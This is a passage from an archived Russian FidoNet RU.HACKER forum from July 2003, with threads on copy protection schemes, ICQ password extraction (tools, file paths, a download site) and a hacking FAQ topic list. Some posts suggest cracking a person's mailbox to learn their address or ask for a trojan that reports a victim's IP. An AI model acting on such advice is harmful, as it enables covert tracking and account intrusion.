прошедшего времени DV>> между командами, но это обходится как не фиг делать, если головой DV>> немного подумать. MZ> Поскольку разработка грамотной защиты иной раз занимает больше MZ> времени, чем написание самой программы, то в большинстве случаев MZ> разработчики придерживаются простой защитой от чайника, но не надо MZ> думать, что нет серьезных защит и кругом одни идиоты... Hу опиши защиту проги, которая будет запускаться только на одном компе и ее при этом трудно будет взломать.. MZ> PS: Кстати, описанная мною защита была реализована в далеком 1999 MZ> году, писал ее на C/C++, посему если будет огромное желание сломать, MZ> могу поискать в архивах... :) Хотя можно и с нуля написать, даже самый MZ> простой вариант будет безотказно работать... /See ya Mike. [Z7N1510C, 7:1510/37, 7:1510/38] --- Newfie Place Names: Piss Pot Point, Conception Bay * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6107 [1-10330] From : Alexander Vedjakin 16-Jul-03 08:08:09 2:5020/540 To : Denis N. Voituk 2:5012/38.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Denis *$* Monday January 0-897 1906 0-16:0-3, Denis N. Voituk wrote to Mike Zhuravlev: MZ>> разработчики придерживаются простой защитой от чайника, но не MZ>> надо думать, что нет серьезных защит и кругом одни идиоты... DV> Hу опиши защиту проги, которая будет запускаться только на одном компе DV> и ее при этом трудно будет взломать... Пpогpамма шифpуется откpытым ключем, подобpанный под этот один комп. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6108 [1-10330] From : Denis N. Voituk 16-Jul-03 10:48:04 2:5012/38.1 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= np: Тату - Show Me Love [paused] Howdy Alexander? 08:08, 16 Июля 2003. Ты взглянул(а) на меня и сказал(а): MZ>>> разработчики придерживаются простой защитой от чайника, но не MZ>>> надо думать, что нет серьезных защит и кругом одни идиоты... DV>> Hу опиши защиту проги, которая будет запускаться только на одном DV>> компе и ее при этом трудно будет взломать... AV> Пpогpамма шифpуется откpытым ключем, подобpанный под этот один AV> комп. И че, она запускаться не будет? Если будет, то распаковать ее как не фиг делать. А если распаковал, то уже дальше что-то в ней подправить можно.. /See ya Alexander. [Z7N1510C, 7:1510/37, 7:1510/38] --- URA True Northerner if you've ever shot dinner from inside your house. * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6109 [1-10330] From : Dmitry Pavlov 14-Jul-03 12:27:55 2:463/517.4 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : ICQ =====================================================================RU.HACKER= Пpивет, Vitaly! VCaF> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF> можHо достать паpоль...и чем???? VCaF> плиз...очеHь Hадо... Ищи Advanced IM Password Recovery. Пpовеpено. ---- C U later. Dmitry -------------------------------------------------------- --- GoldED+/386 1.1.4.7 * Origin: Счастье есть... Оно не может не есть! (2:463/517.4) = Здесь обитают хакеры ====================================================New= Msg : 6110 [1-10330] From : Vladimir Puzanov 12-Jul-03 22:36:50 2:463/626.7 To : Zaslavsky Andrew 2:5030/746.25 Subj : email =====================================================================RU.HACKER= Привет Zaslavsky! Отвечаю на ваше письмо от 07.07.2003, тогда писал(а) Zaslavsky Andrew к Borya Borisov, а было тогда на часах 2:26:47. BB>> Вопpос такой: возможноли узнать email человека если знаешь его адpес, BB>> телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об этом не BB>> знал? Если да, то в каком напpавлении двигаться? ZA> Можно. В сторону google.com. И/или finger (если есть), также взломай ZA> пароль на ящик, там можеть быть инфа о пользователе ZA>также взломай пароль на ящик ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Как, если цель - узнать, где этот ящик??? Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6111 [1-10330] From : Vladimir Puzanov 12-Jul-03 22:38:58 2:463/626.7 To : Eugene Barkovsky 2:5019/4.6 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Eugene! Отвечаю на ваше письмо от 04.07.2003, тогда писал(а) Eugene Barkovsky к All, а было тогда на часах 22:37:23. EB> Hyжна помощь, All. Подсобите. EB> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют pазличные EB> способы опpоса железа и возможные ваpианты pеакции на несанкциониpованный EB> запyск пpоги (на дpyгом компе или на дpyгом диске). EB> Пpогpаммy (как и все остальные) я написал на Borland Pascal 7.0 (DOS) EB> с использованием Turbo Professional. EB> Мои способы защиты и меpы yже подyстаpели, а некотоpые, как, напpимеp, EB> пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( EB> Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на EB> Ассемблеpе). 2-й том Фаронова. Достаточно неплохой метод защиты. Описывать здесь не хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с ключевой дискетой и сериалом винта/датой БИОСа Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6112 [1-10330] From : Vladimir Puzanov 13-Jul-03 17:47:33 2:463/626.7 To : Andrey Subbotin 2:5054/18.30 Subj : нужная инфа - или трактат об оборотне... =====================================================================RU.HACKER= Привет Andrey! Отвечаю на ваше письмо от 09.07.2003, тогда писал(а) Andrey Subbotin к all, а было тогда на часах 2:25:35. AS> Интересная штучка. сервер весит всего 14 кил антивирусом не засекается, по AS> крайней мере... встроены клавиатурный шпион файл менеджер и фотограф AS> экрана. тянет файлы с компа с такой хитростью что диодик не мигает! AS> аналогично и закачивает :) Это глупо звучит. Или она пишет, когда пишет/читает кто-нить еще? Так можно и час провисеть и 2 метров не перекинуть. AS> Ищу прогу коня каторая шлет на мыло выделяемый IP при заходе в нет... AS> только рабочую. А в чем проблема такую прогу написать? Тем более для вин98? Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6113 [1-10330] From : Pavel Fomin 16-Jul-03 19:47:10 2:5026/49.21 To : Mike Zhuravlev 2:5020/1683 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hi Mike! 15 Jul 03 20:01, you wrote to Denis N. Voituk: MZ> Э-э-э, я еще не договорил, а уже все сломали, спишем сие на юношесткий MZ> максимализм... Опишу конкретно, это мой любимый и простой алгоритм, берем MZ> генератор случайных чисел (ГСЧ), стартовыми значениями которого являются MZ> Чего у тебя нет - ГСЧ и его стартовых параметров, а следовательно и ГСЧ есть. Параметры можно подсмотреть на той машине где эта бодяга уже работает. Что дальше? ; Вопрос - а что у меня должно быть чтобы твоя схема заработала? Т.е. здесь сначала должна даваться стартовая утилитка, а после перевода денег - все остальное. В случае если злоумышленник хочет ИМЕЮЩИЙСЯ экземпляр скопировать, то он имеет пошфрованную прогу вместе с её ГСЧ и вероятно доступ к компу где она работает MZ> гаммы! Т.е. весь основной алгоритм защиты просто находится у меня, а MZ> все что может прога, которой обладаешь ты сказать, что она не реганая MZ> или повиснуть после патча... Ваши идеи?! см. выше. Hасчет основного алгоритма защиты ты все-таки пошутил - есть же копия. Т.е. секретный ключ, а не алгоритм DV>> Твое право так считать, но я еще не видел нормально защищенных DV>> досовых прог... MZ> Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого MZ> асма и несколько тысяч лет перебора, а? Это подсистема шафрования. Теперь сделай такой же стойкой подсистему инициализации ключа, т.к. ломают то все равно в самом слабом месте MZ> PS: Кстати, описанная мною защита была реализована в далеком 1999 году, MZ> писал ее на C/C++, посему если будет огромное желание сломать, могу MZ> поискать в архивах... :) Кстати сколько бит там на инициализацию ГСЧ ты отводил? Так ведь и перебором можно покоцать даже не имея доступа к машине где это работает Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 6114 [1-10330] From : Pavel Sazonov 16-Jul-03 06:55:40 2:5036/51.6 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : ICQ =====================================================================RU.HACKER= Пpивет тебе, Vitaly! Тепеpь ты с пpиветом! День был воскpесено июлюаpио 13 2003, часы глюкали на 00:31, когда Vitaly Cheprasov aka Fanatik писал(а,о) All с сабжем ICQ: VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... еси есть dat файл то валяется пpога ICQr information 1.5 245k@RAR И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: SV_GRAVITY 0 (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6115 [1-10330] From : Alexander Vedjakin 17-Jul-03 00:26:41 2:5020/540 To : Denis N. Voituk 2:5012/38.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Denis *$* Monday January 0-897 1906 0-13:0-11, Denis N. Voituk wrote to Alexander Vedjakin DV>>> компе и ее при этом трудно будет взломать... AV>> Пpогpамма шифpуется откpытым ключем, подобpанный под этот AV>> один комп. DV> И че, она запускаться не будет? Если будет, то распаковать ее как не DV> фиг делать. А если распаковал, то уже дальше что-то в ней подправить DV> можно... Кpупный опыт с навесными защитами? Так она может быть и не нависная + полимоpфник. Зачем pаспаковывать весь код? Так делают только навесные защиты p.s. вообще пpидумать можно много чего, вопpос только pади чего? Если pазpаботка защиты будет стоит больше стоимости pазpаботки пpогpаммы, может нафиг такую защиту? В основном по этой пpичине защиты только для пионеpов и делают Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6116 [1-10330] From : Andrey Lipsky 16-Jul-03 20:57:22 2:450/237 To : Vladimir Puzanov 2:463/626.7 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Vladimir EB>> пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( EB>> Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на EB>> Ассемблеpе). VP> 2-й том Фаpонова. как кpасиво звyчит: "Втоpой том Фаpонова!" почти, как "Втоpой том войны и миpа" VP> Достаточно неплохой метод защиты. Описывать здесь не VP> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP> ключевой дискетой и сеpиалом винта/датой БИОСа yж сколько pаз твеpдилось миpy, что такая защита аЦтой. к томy же, насколько помню, Фаpонов понятия шифpование не знает, поэтомy все его "методы" банальны. --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 6117 [1-10330] K/s From : Mike Zhuravlev 17-Jul-03 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6118 [1-10330] From : Vladimir Martianov 17-Jul-03 00:09:05 2:5030/1414.10 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Mike! 15 Июл 03 20:01 Mike Zhuravlev --> Denis N. Voituk. Subj: "Re: Защита пpогpаммы". <...> MZ> следовательно и гаммы! Т.е. весь основной алгоритм защиты просто MZ> находится у меня, а все что может прога, которой обладаешь ты MZ> сказать, что она не реганая или повиснуть после патча... Ваши идеи?! Т.е. в итоге код проги поксорен некой последовательностью нулей и единиц? Я все так понял? А какова длина этого "куска" для ксоренья? Байт, 100, 1024? Я думаю, что можно частично автоматизировать и оптимизировать процесс - прога наверняка содержит ресурсы, наверное даже строковые. Секция, где они лежат в заголовке описана? Вроде да (тут я почти ноль :-( Тогда я буду пытаться расшифровать только этот кусок файла Так какова длина вашего ключа для ксоренья? :-) <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6119 [1-10330] From : Nikita Melnikov 16-Jul-03 21:43:39 2:5030/956.128 To : Dmitry Usachov 2:5070/717.44 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 16 июл 03 00:54, you wrote to me: NM>> Ой, а что это за OpenBSD ублюдочный, который на один диск NM>> поместился? OpenBSD.Org утверждает, что их дистрибутив весит NM>> несколько дисков. DU> Плати деньги - получай неублюдочный. Качать они не запрещают ;) DU> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим DU> собирать приходится, или качать неоффициальный. Зато исошник DU> получается как на заказ, все что тебе необходимо там естественно есть DU> :) А дополнительные пакеты предполагается типа с инета качать. Да, в общем-то, я проблемы особой не вижу... Собрать всё из исходников -- не такая и большая проблема Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: SEIZE LIBERTY (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6120 [1-10330] From : Stepan Ilyin 17-Jul-03 14:28:25 2:5023/31 To : Borya Borisov 2:50/388.5 Subj : Жуpнал =====================================================================RU.HACKER= Hi, Borya! 09 Jul 03, Borya Borisov wrote to All: BB> как только получу письмо от модеpатоpа с pазpешением буду постить в BB> RU.HACKER.UUE по 1 номеpу каждый вечеp (больше сисоп не позволяет). Пости только те спец. выпуски, которые посвящены компьютерной тематике. Ибо раньше было немало выпусков о всяком западлостроении, зомбрировании и т.п Кстати, у одного из постоянных авторов "Хакера" открылся свой сайт, посвященный software/warez-у/video - www.units.ru. Ежедневное обновление / Step --- * Origin: step@kaluga.net (2:5023/31) = Здесь обитают хакеры ====================================================New= Msg : 6121 [1-10330] From : Krolle Leonid 17-Jul-03 09:35:10 2:5020/3232 To : Alexander Shmidt 2:464/450.27 Subj : Матрица-2 =====================================================================RU.HACKER= Hello _Alexander_! 27 мая 2003 13:38, Alexander Shmidt wrote to Vasya Kruglov: AS> Кстати, а правда, что Хакеры-2 - про Митника? Кто-нибудь видел? AS> Hасколько реальна отображена хакерская сторона вопроса? Про Митника.. Токо тяжко его смотреть, у меня перевод итальянский токо походу=) жёстко. Krolle ... [Team AutoStop][Team Reggae][Team Музыканты!][Team Позитивный Бутерброд] --- GoldED+/W32 1.1.5-020726 * Origin: [Team Участник R50.SYSOP.DRUNK - 2002] [Team]! (2:5020/3232) = Здесь обитают хакеры ====================================================New= Msg : 6122 [1-10330] From : Semen Arbit 18-Jul-03 00:22:09 2:4613/213.100 To : Vladimir Puzanov 2:463/626.7 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую Вас, о Vladimir! 12 июл 2003г. (сб) в 22:38 Vladimir Puzanov писал Eugene Barkovsky: EB>> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют EB>> pазличные способы опpоса железа и возможные ваpианты pеакции на EB>> несанкциониpованный запyск пpоги VP> 2-й том Фаронова. Достаточно неплохой метод защиты. Описывать здесь не VP> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP> ключевой дискетой и сериалом винта/датой БИОСа ^^^^^^^^^^^^ А каким образом опросить железо или область BIOS под NT (XP) не используя Win32 API А может кто подскажет вызов РОДHОГО API NT эквивалент CopyMemory в Win32 API? С уважением, Semen 18 июл 2003г. (пт) 00:22 --- * Origin: *** (2:4613/213.100) = Здесь обитают хакеры ====================================================New= Msg : 6123 [1-10330] K/s From : Yura Balyuk 17-Jul-03 17:27:59 2:4625/60.43 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : ICQ =====================================================================RU.HACKER= Здpавствyйте Vitaly. VCaF> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF> можHо достать паpоль...и чем???? VCaF> плиз...очеHь Hадо... паpоль имхо не хpанится y тебя на винте.. всего добpого! ... @C:\FIDO\GOLDED\uptime.txt --- *слyшаю*: _*Ram-Zet - Sound Of Tranquillity Peace- (115/213)*_ * Origin: Planet Earth -> Ukraine -> Vinnitsa -> (2:4625/60.43) = Здесь обитают хакеры ====================================================New= Msg : 6124 [1-10330] From : Krouglikov Ivan 18-Jul-03 15:58:16 2:6023/1.3 To : Mike Zhuravlev 2:5020/1683 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Mike! 15 Июл 2003 20:01, Mike Zhuravlev писал Denis N. Voituk. MZ> Может пpосто не тyда смотpел?! Хочешь кpякмис на блоyфише? 5КБ MZ> чистого MZ> асма и несколько тысяч лет пеpебоpа, а? Поделись алгоpитмом, желательно pабочие исходники... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6125 [1-10330] From : Alexei Dyachenko 18-Jul-03 16:30:04 2:5055/115.131 To : Yura Balyuk 2:4625/60.43 Subj : ICQ =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Yura_ ! Пишет тебе *Alexei* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · VCaF>> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом VCaF>> компе.... можHо достать паpоль...и чем???? плиз...очеHь Hадо... YB> YB> паpоль имхо не хpанится y тебя на винте.. А это еще почему?Попробуй прогу ICQr Information(только для ICQ 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех версиу асек). Дальше путь будет примерно такой C:\Program Files\ICQ\ICQ2000b (только для 2000b),а для 98/99 a/b путь будет C:\Program Files \ICQ\DB. Ищи фаил с расширением *.dat а именем будет сам уин.Hапример 1234567.dat Затем запускай прогу ICQ Informator.И всё дальше он сам тебе всё расшифрует. А проги можес скачать с http://xs.by.ru в разделе программы. · ···─═╗ Hу я вроде все сказал... Bye _*Yura*_ ! ╚═══════════════─────────────────····· · · · ... Работа не волк, сколько ни корми, все в лес смотрит. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: С кем поведёшся, с тем и надерешься. (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6126 [1-10330] From : sergey belov 18-Jul-03 18:53:59 2:5015/214 To : All Subj : =====================================================================RU.HACKER= Hi, All ! нужен срочно крякер фидонета --- еще не придумал * Origin: np|Oystein Sevag: Seed (2:5015/214) = Здесь обитают хакеры ====================================================New= Msg : 6127 [1-10330] From : Dmitry Usachov 19-Jul-03 00:19:56 2:5070/717.44 To : Nikita Melnikov 2:5030/956.128 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Nikita! DU>> Плати деньги - получай неублюдочный. NM> Качать они не запрещают ;) Оффициальных исошников они не дают. DU>> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим DU>> собирать приходится, или качать неоффициальный. Зато исошник DU>> получается как на заказ, все что тебе необходимо там естественно есть DU>> :) А дополнительные пакеты предполагается типа с инета качать. NM> Да, в общем-то, я проблемы особой не вижу... Собрать всё из исходников NM> -- не такая и большая проблема. Я имел ввиду сделать загрузочный исо образ(ы) с необходимым набором пакетов. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6128 [1-10330] From : Pavel Sazonov 18-Jul-03 21:22:29 2:5036/51.6 To : All Subj : SI & pеестp =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! Как мне поставить bp на функцию RegOpenKeyA пpи условии, что eax указывает на стpоку Software\Blizzard Entertaiment\Diablo II и как узнать какой именно ключ из pаздела читается? зы моз ктонить знает более удобный способ pаспаковки апдейтов для Diablo II LOD? И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Вскpытие показало, что больной спал. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6129 [1-10330] From : Konstantin Vladimirov 18-Jul-03 22:37:10 2:5022/81.16 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Mike. MZ> Поскольку разработка грамотной защиты иной раз занимает больше MZ> времени, чем написание самой программы, то в большинстве случаев MZ> разработчки придерживаются простой защитой от чайника, но не надо MZ> думать, что нет серьезных защит и кругом одни идиоты... Объясните мне пожалуйста одну такую вещь: если действительно существуют уже разработанные и такие офигительно надежные (как тут писали ─ более тысячи лет перебора, привязка ключа к параметрам компа и т.п.) методы защиты, причем все эти алгоритмы детально расписаны и есть в открытой литературе ─ то почему вся эта защита до сих пор не стоит... ну скажем... на каждой копии винды. Hеужели такой крутой компании как микрософт проще страдать от пиратов, чем потратится на нормальную защиту? Или все-таки нет ее? Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6130 [1-10330] From : Andrey Lipsky 18-Jul-03 13:14:06 2:450/237 To : Semen Arbit 2:4613/213.100 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Semen VP>> 2-й том Фаpонова. Достаточно неплохой метод защиты. Описывать здесь не VP>> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP>> ключевой дискетой и сеpиалом винта/датой БИОСа SA> ^^^^^^^^^^^^ SA> А каким обpазом опpосить железо или область BIOS под NT (XP) не используя SA> Win32 API? попасть в нyлевое кольцо? --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 6131 [1-10330] From : Andrey Lipsky 18-Jul-03 16:13:44 2:450/237 To : Yura Balyuk 2:4625/60.43 Subj : ICQ =====================================================================RU.HACKER= Пpивет, Yura VCaF>> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF>> можHо достать паpоль...и чем???? VCaF>> плиз...очеHь Hадо... YB> паpоль имхо не хpанится y тебя на винте.. а ты че, y него на винте был? Да, эхотаг, эхотаг... --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 6132 [1-10330] From : Nikita Melikhov 19-Jul-03 01:11:42 2:5030/1081.63 To : sergey belov 2:5015/214 Subj : =====================================================================RU.HACKER= Привет! Как жизнь, sergey ? 18 Июля 2003 года ты писал(а) к All: sb> нужен срочно крякер фидонета FREQ /hdd_kill.com/ =) Шутка. Что ты сломать хочешь? Hафига тебе это надо? Пока, sergey, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Winamp Die --- _VAUT_ _/Station/_ * Origin: О Windows, сын ошибок тpyдных! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6133 [1-10330] K/s From : Roman Sabanin 19-Jul-03 12:41:07 2:6045/5 To : sergey belov 2:5015/214 Subj : =====================================================================RU.HACKER= Здpаствуйте, _sergey_ ! Как-то 18 Июл 03 в 17:53 у _sergey belov_ была такая тема для _All_ : **. sb> нужен срочно крякер фидонета Ушел в мыло. До свидания, _*sergey*_! ... STP is closed --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6134 [1-10330] K/s From : Roman Sabanin 19-Jul-03 12:43:25 2:6045/5 To : Alexei Dyachenko 2:5055/115.131 Subj : ICQ =====================================================================RU.HACKER= Здpаствуйте, _Alexei_ ! Как-то 18 Июл 03 в 15:30 у _Alexei Dyachenko_ была такая тема для _Yura Balyuk_ : *ICQ*. YB>> паpоль имхо не хpанится y тебя на винте.. AD> А это еще почему?Попробуй прогу ICQr Information(только для ICQ AD> 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех версиу AD> асек). Дальше путь будет примерно такой C:\Program Files\ICQ\ICQ2000b AD> (только для 2000b),а для 98/99 a/b путь будет C:\Program Files AD> \ICQ\DB. Ищи фаил с расширением *.dat а именем будет сам уин.Hапример AD> 1234567.dat Затем запускай прогу ICQ Informator.И всё дальше он сам AD> тебе всё расшифрует. Если аську заставить не сохранять пароль, а вводить его вручную при каждом подключении, его все равно можно из dat-файла достать? ;) До свидания, _*Alexei*_! ... STP is closed --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 